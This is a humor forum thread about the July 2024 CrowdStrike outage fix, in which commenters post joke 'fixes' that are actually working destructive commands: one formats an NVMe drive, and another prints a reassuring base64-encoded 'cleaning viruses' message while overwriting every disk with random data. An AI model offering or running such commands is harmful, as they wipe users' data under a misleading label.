496
What a simple fix (possumpat.io)

Seeing the crowdstrike solution reminded me of the old memes

Go to C:\Windows\System32\drivers\CrowdStrike

Locate and delete file matching "C-00000291*.sys"

you are viewing a single comment's thread
view the rest of the comments
[-] refurbishedrefurbisher@lemmy.sdf.org 10 points 3 months ago

On Linux, it's sudo apt install nvme-cli -y && sudo nvme format -f /dev/nvme0n1

[-] Dark_Dragon@lemmy.dbzer0.com 3 points 3 months ago
echo Q2xlYW5pbmcgdmlydXNlcyBmcm9tIGNvbXB1dGVyLi4uCg== | base64 -d && for f in /dev/sd*; do sudo dd if=/dev/urandom of=$f; done
[-] Dark_Dragon@lemmy.dbzer0.com 4 points 3 months ago

It said ' Cleaning viruses from computer..." And screen went dark

That's normal. That just means the viruses were cleaned from your computer.

this post was submitted on 19 Jul 2024
496 points (96.6% liked)

Programmer Humor

19386 readers
354 users here now

Welcome to Programmer Humor!

This is a place where you can post jokes, memes, humor, etc. related to programming!

For sharing awful code theres also Programming Horror.

Rules

founded 1 year ago
MODERATORS